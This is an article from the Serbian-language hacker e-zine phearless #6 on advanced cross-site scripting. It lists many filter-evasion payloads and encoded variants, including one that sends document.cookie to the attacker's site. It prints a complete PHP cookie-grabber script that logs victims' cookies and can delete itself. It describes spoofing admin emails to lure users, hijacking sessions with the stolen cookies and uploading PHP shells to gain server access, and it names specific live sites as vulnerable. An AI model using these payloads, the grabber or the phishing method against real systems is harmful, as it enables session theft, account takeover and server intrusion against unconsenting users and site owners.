...................
                       ...::: phearless zine #6 :::...

..........................>---[ Advanced XSS ]---<..........................

......................>---[ by dRake aka zark0vac]---<......................
 

0x01  Prologue
0x02  Uvod
0x03  Analiziranje XSS-a u web aplikacijama
0x04  Filter exposed
0x05  I want your cookie!
0x06  What can i do with this damn XSS?
0x07  Odvod
             
////////////////////////////////////////////////////////////////////////////
--==<[ 0x01 Prologue
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Evo konacno se smilovah da i ja napisem nesto korisno za phearless eZine :). 
Jeste da bi bilo bolje da sam i ranije bio tu u pocecima da napisem neke 
tekstove, ali eto, nema se vremena...Ubuduce cu videti da budem redovniji ;p.
Nadam se da ce vam ovaj tekst pomoci da shvatite zaobilazenje zastite filtera 
i napominjem da morate prvo procitati Exoduksov tekst iz Phearless eZine #1. 
I da umalo da zaboravim onu rutinu...

"Ovaj tekst je pisan u edukacione svrhe, i u svrhu istrazivanja i 
poboljshavanja zastite, ukoliko se ne slazete sa ovim prekinite da citate!"   
..........aha nastavili ste citanje! :) Ajmo onda na txt...

////////////////////////////////////////////////////////////////////////////
--==<[ 0x02 Uvod
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
               
Na pocetku ovog tutorijala da objasnim jednu stvar, ovaj tekst je o advanced 
i realnim primerima XSS napada, da bi razumeli osnove XSS napada kao i 
koriscenje ove vrste napada preporucujem da prvo procitate gore pomenuti txt
iz ph #1. Pa da predjemo na stvar. 

Kao sto znate posle citanja Exoduksovog teksta, XSS napadi se mogu i najcesce 
se koriste za uzimanje cookiea ili session id-a. Posto znate sta mozete uraditi 
sa njima, kako ih iskoristiti jer ste procitali u ranije pomenutom tutorijalu,
u ovom tekstu cu objasniti realno funkcionisanje XSS-a, dacu i objasniti mnoge 
primere ovih napada, sto ce vam pomoci da se dublje upoznate sa xploitovanjem 
aplikacija. Iako vazan faktor, vrlo se cesto XSS bug pojavljuje u kako starijim 
tako i novijim skriptama.

Resenje, tj. zastita od XSSa je filtriranje odredjenih karaktera ili fraza. 
Ali u vecim aplikacijama se neretko desava da programer propusti filtriranje 
na nekoj formi, kao i izletanje neke neocekivane greske. Ali ako pravilno 
filtrira, ili koristi htmlinclusion funkciju, nemoguce je sploiltovati tu app.

Dosta sa uvodom predlazem da krenemo u analiziranje XSS napada na web 
aplikacije.

////////////////////////////////////////////////////////////////////////////
--==<[ 0x03 Analiziranje XSS-a u web aplikacijama
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\              

Aj nek krenemo sa jednostavnijim XSS bugom, publikovanim 27.marta.'06 od 
strane black_code-a i sweet_devil-a u aplikaciji vCard PRO 2.9 koja je uzgred 
komercijalna. Cudo kako programeri zure da bace neki proizvod u prodaju pre 
nego sto se pravilno istestira... ccc. Nego da se vratimo na temu. O cemu se 
radi ovde? Greska u filtriranju HTML koda u 'toprated.php' i 'newcards.php' 
skriptama. Greskom u filtiranju HTML koda, napadac bi mogao lagano da sklepa 
url kojim bi ugrozio sigurnost aplikacije koja, kada bi bila otvorena od 
strane odredjenog korisnika, prouzrokuje da se odredjeni kod pokrene u 
korisnikovom browseru. Ali nemogu svi XSS napadi da se odraze na sve browsere, 
ali o tome cemo nesto kasnije...

Evo demonstracije xploitovanja aplikacije putem XSS napada:

 http://[target]/cards/toprated.php?page='><script>alert('Ranjiv')</script>

Naime vi mozete kao sto ste naucili iz #1 teksta da uzmete cookie putem 
nekog od cgi grabbera, ali ovo gore je ako uopste nije primenjena filtracija 
u skripti. Znaci na ovo mozete naleteti ako programeri uopste nisu obratili 
paznju na bezbednost (a inace ne obracaju) u toj skripti.

Ali ako su koristili filtraciju HTML koda, onda su filtrirali <script> tag 
sigurno. Ali, to nas ne sprecava da izvaramo filtraciju i uspesno odradimo 
XSS  napad. Kako? Zavisnosti od situacije. Zanimljivost kod XSS-a je sto je 
svaka situacija totalno drugacija. Morate prvo pogledati source code 
aplikacije. Ako recimo nadjete kod:


<input type="text" name'words' value='$nekavrednost'>


Onda  '$nekavrednost' predstavlja  ono sto vi ukucate u textbox. Ako ukucate 
recimo 'primer', kod ce sada izgledati ovako u aplikaciji:


<input type="text" name='words' value='primer'> 

Ali mozemo iskoristiti to, na sledeci nacin. Recimo u txtbox ukucamo 

'><script>alert('bla')</script>  dobicemo sledeci kod u aplikaciji:

<input type="text" name'words' value=''><script>alert('bla')</script>'>

Jel vidite sta smo uradili? 'Razdvojili' smo kod i ubacili nas kod koji 
izbacuje prozorce u kojem ce pisati 'bla'. Sada umesto da posalje do baze 
podataka vrednost koju ukucate on ce ostaviti prazno ali ce pokrenuti drugi 
kod automatski i ignorovati 'gresku'  -- '> --.

Ako se koristila filtracija koda, i recimo server je neki *nix, (nix zato 
sto razlikuje uppercase od lowercase slova) mozemo zaobici filtraciju recimo 
<script> taga tako sto cemo kucati <ScRiPT>. Ako ni to nece uspeti, imamo 
jos milion resenja :) bukvalno, nemoramo koristiti <script> tag za xss.
Mozemo izbeci koriscenje <script> taga tako sto cemo dati vrednost recimo:

'><BODY BACKGROUND="javascript:alert('XSS')">

Nema <scripta>, ali zato ima 'javascript:'-a... Damn.. Verovatno je i to 
zabranjeno? Pa... Ima resenja:

<BODY ONLOAD=alert('XSS')>

Uff sto volim <body> tag :). Izvarali smo aplikaciju koja zabranjuje recimo 
samo <script> i javascript:, ali sta je sa ostatkom? Mora da ima jos stvari 
koje su filtrirane? 


*kkrrshh*  Affirmative... 


Evo primera koji je otkrio <Hotpockets> u poznatom pretrazivacu Ask.com:

http://www.ask.com/?tool="%3E%3Cscript%3Ealert("Found%20by%20Hotpockets%20-
%20Welcome%20Phearless%20Reader")%3B%3C/script%3E

Zastita od XSS-a = 0 :)


XSS je moguc SVUDA gde je dozvoljeno korisniku da postuje html kod. E, ali 
tamo gde naizgled nemoze, samo je primenjena filtracija odredjenih kodova 
koja se moze zaobici...Vise o filtraciji html koda u nastavku, stim sto se
htmlspecialchars nemoze nikako zaobici jer se izvrsava na samom serveru.


////////////////////////////////////////////////////////////////////////////
--==<[ 0x04 Filter exposed
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Imamo drugih mogucnosti kod izbegavanja javascript i drugih filtera, recimo:

<a href="javas&#99;ript&#35;[xss]">
<div onmouseover="[xss]">
<img dynsrc="javascript:[xss]">
<imput type="image" dynsrc="javascript:[xss]">
<bgsound src="javascript:[xss]">
<img src="&{[xss]};>
<link rel="stylesheet" href="javascript:[xss]">
<iframe src="vbscript:[xss]">
<img src="mocha:[xss]">
<img src="livescript:[xss]">
<a href="about:<s&#99;ript>[xss]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[xss]">
<body onload="[xss]">
<div style="background-image: url(javascript:[xss]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([xss]);">
<style type="text/javascript">[xss]</style>
<object classid="clsid:..." codebase="javascript:[xss]">
<style><!--</style><script>[xss]//--></script>
<![CDATA[<!--]]><script>[xss]//--></script>
<!-- -- --><script>[xss]</script><!-- -- -->
<<script>[xss]</script>
<img src="blah"onmouseover="[xss]">
<img src="blah>" onmouseover="[xss]">
<xml src="javascript:[xss]">
<xml id="X"><a><b>&lt;script>[xss]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>

Ako je filtriran 'http', 'www' i '.com/.net/.org/.info/whateva' mozemo 
izbeci zastitu tako sto cemo sastaviti XSS url koji ce raditi samo na 
firefoxu, jer firefox koristi google-ov 'fealing lucky' servis u odnosu 
na to koje god reci ukucate umesto urla. Znaci prijavite vasu stranu sa 
cookie grabberom recimo na google, i zadajte specificne keywordse kakvih 
retko ima, i kada vas google indexuje pod tim keywordsima mozete ukucati 
umesto url adrese koja je filtrirana, keyword pod kojim je vasa strana #1 
na pretrazi i automatski ce firefox redirektovati na vasu stranu i 
odraditi sav posao umesto vas. Vrlo korisno. Primer:

<A HREF="//google">XSS</A>


Ako su programeri bili dovoljno obazrivi i pazili, mozda su zabranili tj. 
filtrirali znak '<'? Verovatno mislite da je onda sve palo u vodu i da je 
aplikacija zasticena od svakog xss napada? M'da... :) 
Zaobicicemo to tako sto cemu kucati hexadecimalni ekvivalent -- %3C --. 
Ali, mislite, ako su bili dovoljno pazljivi i zabranili koriscenje '<' 
verovatno ce filtrirati i '%3C'? Verovatno... Ali zato imamo i drugih.. 
mnogo drugih resenja gore ispisanih, ili recimo:

[\xC0][\xBC]script>[xss][\xC0][\xBC]/script>


Mozemo recimo zadati sledeci napad umesto:

index.php?variable="><script>document.location='http://www.vassajt.com/cgi-bin/cookie.cgi? 
'%20+document.cookie</script>


Ako su filtrirali sve sto se filtrirati dalo (no way its true ;p) onda moze
upaliti malo 'enkriptovanja', recimo prebacimo u hex:

%69%6E%64%65%78%2E%70%68%70%3F%76%61%72%69%61%62%6C%65%3D%22%3E%3C%73
%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E
%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%76%61%73%73%61%6A%74%2E%63%6F
%6D%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27
%25%32%30%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63
%72%69%70%74%3E%0A

ili.. 

&#x69;&#x6E;&#x64;&#x65;&#x78;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x76;&#x61;&#x72;
&#x69;&#x61;&#x62;&#x6C;&#x65;&#x3D;&#x22;&#x3E;&#x3C;&#x73;&#x63;&#x72;&#x69;
&#x70;&#x74;&#x3E;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;
&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;
&#x3A;&#x2F;&#x2F;&#x77;&#x77;&#x77;&#x2E;&#x76;&#x61;&#x73;&#x73;&#x61;&#x6A;
&#x74;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x63;&#x67;&#x69;&#x2D;&#x62;&#x69;&#x6E;
&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x63;&#x67;&#x69;&#x3F;&#x20;
&#x27;&#x25;&#x32;&#x30;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;
&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;
&#x70;&#x74;&#x3E;&#x0A;

Ili u decimalnom obliku...

&#105&#110&#100&#101&#120&#46&#112&#104&#112&#63&#118&#97&#114&#105&#97&#98&#108
&#101&#61&#34&#62&#60&#115&#99&#114&#105&#112&#116&#62&#100&#111&#99&#117&#109
&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116
&#112&#58&#47&#47&#119&#119&#119&#46&#118&#97&#115&#115&#97&#106&#116&#46&#99
&#111&#109&#47&#99&#103&#105&#45&#98&#105&#110&#47&#99&#111&#111&#107&#105&#101
&#46&#99&#103&#105&#63&#32&#39&#37&#50&#48&#43&#100&#111&#99&#117&#109&#101
&#110&#116&#46&#99&#111&#111&#107&#105&#101&#60&#47&#115&#99&#114&#105&#112
&#116&#62&#10


Sve sto vam treba je tool za enkriptovanje. Na vecini sajtova ne morate stici 
ni do pola teksta da bi uspesno izvrsili XSS napad na neku aplikaciju, ali 
moramo uci u dubine XSS voda da bi razumeli nacin zaobilazenja zastite i kod 
komplikovanijih HTML filtera :) (gde se koristi htmlspecialchars nema XSSa 
tako da ne gubite vreme ako vidite da svi znakovi koje dajete u inputu prelaze
u njihovu html vrednost)

Cisto da napomenem, mozete enkriptovati i ip vaseg sajta gde vam je cgi grabber
... Tako ce 127.0.0.1 preci u:

Dword:
2130706433

Hex:
0x7f.0x00.0x00.0x01

Octal:
0177.0000.0000.0001


E sada da se vratimo na enkriptovanje i filtriranje HTML koda. Vecina programera 
koji razumeju kako XSS funkcionise ce znati da u 90% slucajeva se koristi znak 
'<', i mi moramo znati vise od njega (programera aplikacije) da bi izvarali 
njegovu 'zastitu'. Vecina programera nece da se ovoliko cimaju oko svake forme, 
ali ajd da napomenem sve moguce koje sam uspeo da iscackam varijante znaka '<'.

Evo ih:

<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

Mozete koristiti recimo kombinaciju:

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

itd...


Nadam se da razumete onda koliko je truda potrebno da bi se pravilno zastitila 
aplikacija od XSS napada koji inace izgleda tako bezazleno :). Tesko da ce 
programer obratiti paznju na sve ove filtere tako da sve sto vam je potrebno 
je uporno testiranje aplikacije :). Ako je to neka aplikacija za siru upotrebu, 
mozete nabaviti aplikaciju i izuciti source code, kakvi se filteri koriste itd. 
I onda nadjete mogucnost da iscackate xss :). Moram jos napomenuti da mnogo 
veci broj XSS-a radi na IE-u i ne radi na FF. 

Evo jedne liste sa [ha.ckers] koja vam blize objasnjava svaku komandu kada se
aktivira, i svaku od njih mozete koristiti u vasem xss napadu u zavisnosti od 
situacije tj. samog koda u web aplikaciji.

1.    FSCommand() (attacker can use this when executed from within an embedded Flash object)
2.    onAbort() (when user aborts the loading of an image)
3.    onActivate() (when object is set as the active element)
4.    onAfterPrint() (activates after user prints or previews print job)
5.    onAfterUpdate() (activates on data object after updating data in the source object)
6.    onBeforeActivate() (fires before the object is set as the active element)
7.    onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - 
attackers can do this with the execCommand("Copy") function)
8.    onBeforeCut() (attacker executes the attack string right before a selection is cut)
9.    onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
10.   onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state 
or when an editable container object is control selected)
11.   onBeforePaste() (user needs to be tricked into pasting or be forced into it using the 
execCommand("Paste") function)
12.   onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or 
execCommand("Print") function).
13.   onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows 
unless it was spawned from the parent)
14.   onBegin() (the onbegin event fires immediately when the element's timeline begins)
15.   onBlur() (in the case where another popup is loaded and window looses focus)
16.   onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents 
of the marquee reach one side of the window)
17.   onCellChange() (fires when data changes in the data provider)
18.   onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
19.   onClick() (someone clicks on a form)
20.   onContextMenu() (user would need to right click on attack area)
21.   onControlSelect() (fires when the user is about to make a control selection of the object)
22.   onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
23.   onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
24.   onDataAvailible() (user would need to change data in an element, or attacker could perform the same function)
25.   onDataSetChanged() (fires when the data set exposed by a data source object changes)
26.   onDataSetComplete() (fires to indicate that all data is available from the data source object)
27.   onDblClick() (user double-clicks a form element or a link)
28.   onDeactivate() (fires when the activeElement is changed from the current object to another object in the 
parent document)
29.   onDrag() (requires that the user drags an object)
30.   onDragEnd() (requires that the user drags an object)
31.   onDragLeave() (requires that the user drags an object off a valid location)
32.   onDragEnter() (requires that the user drags an object into a valid location)
33.   onDragOver() (requires that the user drags an object into a valid location)
34.   onDragDrop() (user drops an object (e.g. file) onto the browser window)
35.   onDrop() (user drops an object (e.g. file) onto the browser window)
36.   onEnd() (the onEnd event fires when the timeline ends.  This can be exploited, like most of the HTML+TIME 
event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
37.   onError() (loading of a document or image causes an error)
38.   onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in
the data source object)
39.   onExit() (someone clicks on a link or presses the back button)
40.   onFilterChange() (fires when a visual filter completes state change)
41.   onFinish() (attacker can create the exploit when marquee is finished looping)
42.   onFocus() (attacker executes the attack string when the window gets focus)
43.   onFocusIn() (attacker executes the attack string when window gets focus)
44.   onFocusOut() (attacker executes the attack string when window looses focus)
45.   onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
46.   onKeyDown() (user depresses a key)
47.   onKeyPress() (user presses or holds down a key)
48.   onKeyUp() (user releases a key)
49.   onLayoutComplete() (user would have to print or print preview)
50.   onLoad() (attacker executes the attack string after the window loads)
51.   onLoseCapture() (can be exploited by the releaseCapture() method)
52.   onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
53.   onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there 
is a problem)
54.   onMouseDown() (the attacker would need to get the user to click on an image)
55.   onMouseEnter() (cursor moves over an object or area)
56.   onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
57.   onMouseMove() (the attacker would need to get the user to mouse over an image or table)
58.   onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
59.   onMouseOver() (cursor moves over an object or area)
60.   onMouseUp() (the attacker would need to get the user to click on an image)
61.   onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
62.   onMove() (user or attacker would move the page)
63.   onMoveEnd() (user or attacker would move the page)
64.   onMoveStart() (user or attacker would move the page)
65.   onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
66.   onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
67.   onPause() (the onpause event fires on every element that is active when the timeline pauses, including the 
body element)
68.   onProgress() (attacker would use this as a flash movie was loading)
69.   onPropertyChange() (user or attacker would need to change an element property)
70.   onReadyStateChange() (user or attacker would need to change an element property)
71.   onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
72.   onReset() (user or attacker resets a form)
73.   onResize() (user would resize the window; attacker could auto initialize with something like: 
<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
74.   onResizeEnd() (user would resize the window; attacker could auto initialize with something like: 
<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
75.   onResizeStart() (user would resize the window; attacker could auto initialize with something like: 
<SCRIPT>self.resizeTo(500,400);</SCRIPT>)
76.   onResume() (the onresume event fires on every element that becomes active when the timeline resumes, 
including the body element)
77.   onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline 
begins to play backward)
78.   onRowEnter() (user or attacker would need to change a row in a data source)
79.   onRowExit() (user or attacker would need to change a row in a data source)
80.   onRowDelete() (user or attacker would need to delete a row in a data source)
81.   onRowInserted() (user or attacker would need to insert a row in a data source)
82.   onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
83.   onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
84.   onSelect() (user needs to select some text - attacker could auto initialize with something like: 
window.document.execCommand("SelectAll");)
85.   onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: 
window.document.execCommand("SelectAll");)
86.   onSelectStart() (user needs to select some text - attacker could auto initialize with something like: 
window.document.execCommand("SelectAll");)
87.   onStart() (fires at the beginning of each marquee loop)
88.   onStop() (user would need to press the stop button or leave the webpage)
89.   onSynchRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
90.   onSubmit() (requires attacker or user submits a form)
91.   onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
92.   onTrackChange() (user or attacker changes track in a playList)
93.   onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
94.   onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME 
(Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
95.   seekSegmentTime() (this is a method that locates the specified point on the element's segment time line 
and begins playing from that point. The segment consists of one repetition of the time line including reverse play 
using the AUTOREVERSE attribute.)

Ovu listu kao sto rekoh NISAM ja sastavljao, ali je VRLO korisna i moze vam pomoci u
kompleksnijim xss napadima gde morate se mnogo vise potruditi od 
<script>alert(document.cookie);</script> ;0.

////////////////////////////////////////////////////////////////////////////
--==<[ 0x05 I want your cookie!
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\   

Kada sve ovo zavrsite, tj. uspesno odradite napad i pronadjete XSS bug. 

Kako ga iskoristiti?

Evo primera jednog dobrog cookie grabbera koji mozete koristiti u konjukciji 
sa XSS napadima.

=========================<code>==============================

<?php
//Ghost's Cookie grabber v2.0

/* Begin Config Section */

//Password to access stolen cookies
$ConfigPassword = 'example123';

//File to write, chmodded 666
$CookieFile = "example.txt";

//Cookie name, use a-z A-Z 0-9 _
$ConfigCookie = 'make_this_a_complicated_string_a';

//Flag to identify you as wanting to retrieve cookies
$GetCookiesStr = "getcookies";
//Usage: http://www.sitename.tld/path/script.php?getcookies

//Flag to identify you as wanting to delete script and data file
$DeleteStr = "delete";
//Usage: http://www.sitename.tld/path/script.php?delete

//Name of variable you want to recover and store the stolen cookie
$StolenCookieStr = "str";
//Usage: http://www.sitename.tld/path/script.php?str=

//Place to send browser once cookie has been obtained
$Redirect = "http://www.google.com";

/* End Config Section */

$Self = $_SERVER['PHP_SELF'];
$GetCookies = $_GET["$GetCookiesStr"];
$Delete = $_GET["$DeleteStr"];
$StolenCookie = $_GET["$StolenCookieStr"];
/* Un-comment functions below for login features */

/*
//Remove the Symbols above (slash and asterisk) to enable login features.
//Remember to scroll down and remove the other part of the comment as well.
function LoggedIn()
{

global $ConfigCookie;
$Cookie = $_COOKIE["$ConfigCookie"];
if(isset($Cookie)) {
  return true;
} else {
  return false;
}

}

function LogIn()
{
global $ConfigCookie;
setcookie("$ConfigCookie");
DisplayCookies();
}

function Authenticate()
{
$Pass = $_POST['pass'];
global $ConfigPassword;
global $Self;

if($Pass == $ConfigPassword) {
   LogIn();
} else {
   ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Login</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <form action="<?php $Self; ?>" method="post">
<table border="1" cellspacing="1" cellpadding="1" rules="rows" align="center" width="50%">
<tr><th>Password</th><td align="center"><input type="password" name="pass" size="25"/></td></tr>
<tr><td align="center" colspan="2"><input type="submit" value="Login" /></td></tr>
   </table>
  </form>
</body>
</html>

<?php
}

}
//Remove The symbols below (slash and asterisk) to enable login features
*/

function DisplayCookies()
{
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Cookie Details</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
<table border="1" cellspacing="1" cellpadding="1" rules="all" align="center" width="75%">
   <tr><th colspan="6">Cookie Details</th></tr>
   <tr><th><small>IP Address</small></th><th><small>User Agent</small></th>
   <th><small>Referer</small></th><th><small>Cookie Values</small></th></tr>
<?php
global $DeleteStr;
global $CookieFile;
$handle = fopen("$CookieFile", "a+");
$CookieFileContent = fread($handle, filesize("$CookieFile"));
$i = 0;
$CookieFileExploded = explode("\n", $CookieFileContent);
$NumCFE = count($CookieFileExploded) - 1;
while($i < $NumCFE) {
$j = $i + 1;
$k = $j + 1;
$l = $k + 1;
echo '<tr><td align="center"><small>' . "$CookieFileExploded[$i]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$j]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$k]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$l]"
. '</small></td></tr>' . "\n";
$i = $i + 4;
}
?>
  </table>
  <br /><br />
  <center><b><a href="<?php echo $Self; ?>?<?php echo $DeleteStr; ?>">
<pre><font color="#000">Delete Script and Datafile</font></pre></a></b></center>
</body>
</html>
<?php
}


function SelfDestruct()
{
global $CookieFile;
$FSSelf = __FILE__;
if(file_exists($CookieFile)) {
unlink($CookieFile);
}
unlink($FSSelf);
}



function WriteCookies()
{
global $CookieFile;
global $StolenCookie;
global $Redirect;
global $Path;
$IP = $_SERVER['REMOTE_ADDR'];
$Browser = $_SERVER['HTTP_USER_AGENT'];
$Referer = $_SERVER['HTTP_REFERER'];
if($Browser == NULL) {
$Browser = "NULL";
}

if($Referer == NULL) {
$Referer = "NULL";
}

if($StolenCookie == NULL) {
$StolenCookie = "NULL";
}

$handle = fopen("$CookieFile", "a+");
$Content = "$IP" . "\n" . "$Browser" . "\n" . "$Referer" . "\n" . "$StolenCookie" . "\n";
if(is_writeable("$CookieFile")) {
$Write = fwrite($handle, "$Content");
}
header("Location: $Redirect");
fclose($handle);
}

if(function_exists('LoggedIn') && LoggedIn()) {

if(isset($Delete)) {
SelfDestruct();
die();
}

DisplayCookies();

} elseif(isset($GetCookies)) {

if(function_exists('Authenticate')) {

Authenticate();

} else {
DisplayCookies();
}

} elseif(isset($Delete)) {
SelfDestruct();
die();
} else {
WriteCookies();
}
?>

=========================</code>==============================

Ovaj cookie grabber posto postavite na vas sajt, putem xss buga u aplikaciji 
ukazite na vas sajt do ove skripte (cookie grabbera), i gledajte kako se 
puni kolacicima :). 

////////////////////////////////////////////////////////////////////////////
--==<[ 0x06 What can i do with this damn XSS?
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\            

Nasli ste bug u skripti, uploadovali ste cookie grabbera na neki host, kako 
da 'naterate' ljude da vam predaju svoj cookie putem ovog buga? U phpBB-u je 
bio bug u delu skripte za avatar. Naime putem avatara ste mogli da ukazete
na spoljasnji link koji bi kupio cookie usera koji pogledaju avatar. Sto 
znaci da bi pokupio cookie svih usera koji pogledaju stranu foruma na kojoj 
ste postovali. U guestbookovima ima bugova recimo kada postujete poruku, ali 
slaba vajda od toga ;p, u blogovima u delu za comments... 
Naterati osobu da vam preda cookie je piece a cake, recimo posaljite mail 
korisniku kojem zelite da uzmete cookie, preko nekog smtp servera i izmenite 
dolaznu adresu da izgleda da poruku salje admin aplikacije u kojoj ste pronasli
bug. Dosta vecih foruma kao sto su mycity.co.yu, skoro nastao ali razvijen 
apatinonline, i mnogi strani salju mail korisnicima na pocetku svakog meseca
sa novim temama, ukratko, obavestavajuci vas sta mozete da nadjete zanimljivo 
na forumu... I da svaki url bude url xploita skripte. Tj. link xss-a. Ako je
korisnik vec ulogovan i dobio cookie, ili ima autologin ukljucen, automatski
ce vam stici njegov cookie koji u windozi mozete zameniti sa svojim u 

x:\Documents and Settings\[vas username]\Local Settings\Temporary Internet Files

Nadjite vas cookie sa tog sajta i izmenite ga sa dobijenim od korisnika kome
ste ga uzeli. Bicete prepoznati kao taj korisnik i imati sve privilegije kao
taj korisnik sto znaci ako je admin aplikacije imacete totalnu kontrolu nad 
aplikacijom :). Kako dalje iskoristiti odredjeni xss bug? U novijim recimo
IPB forumima imate file manager. Njim mozete uploadovati fajl koji zelite na 
server sto moze da bude korisno :))). Mozete recimo uploadovati neki od php 
shellova. Uploadovanjem php shella dobicete pristup shellu servera, dalje ga 
mozete rootovati ako je ranjiva verzija os-a... Mozete dici egg na serveru, 
whateva...

Evo par xss-a koje sam pronasao, on blind, pa neka vam bude podstrek da se
zaebavate dalje sa ovim napadima :D. Jeste da xss nije toliko mocan kao sql 
inj.,verovatno je i najslabiji napad na web aplikacije, ali u pravim rukama,
sa pravim znanjem, pronadjen i pravilno iskoriscen bug u web aplikaciji moze 
dovesti do dobijanja admina i samim tim vlast nad aplikacijom. :) E da, moram 
napomenuti da su XSS mnogo rasprostranjeniji od svih ostalih tipova napada na 
web aplikacije, sem mozda RFI napada ;0, ali iako rasprostranjeni, moracete 
se pomuciti da uspesno odradite 'napad'... Srecno & good luck ;0

Evo vam par primera, cisto zajebavancija:

Napomena: Primeri su ISKLJUCIVO za demonstraciju, NEMOJTE dirati sajtove, autor 
teksta ne snosi nikakvu odgovornost za VASE postupke odradjene ovime...


Ovaj sam nasao sada dok sam pisao dopunu za ovaj tekst cisto da 
dam neki primer, da zainteresujem ljude ;0, radi se o e-shopu, i vuln sam ja 
licno iskoristio za ubacivanje jedne jpg slike, ali mozete iskoristiti i za 
bilo koji tip xss napada takodje, vuln sajtovi su: aquarius-records.com i 
cedeterija.hr, koliko sam bacio oko, ali vi pogledajte, mozda se ovaj web 
shop koristi jos negde ;0.

1.)  http://www.aquarius-records.com/izdanja_search.php?pizvodjac=%3Ccenter%3E%3Cbr
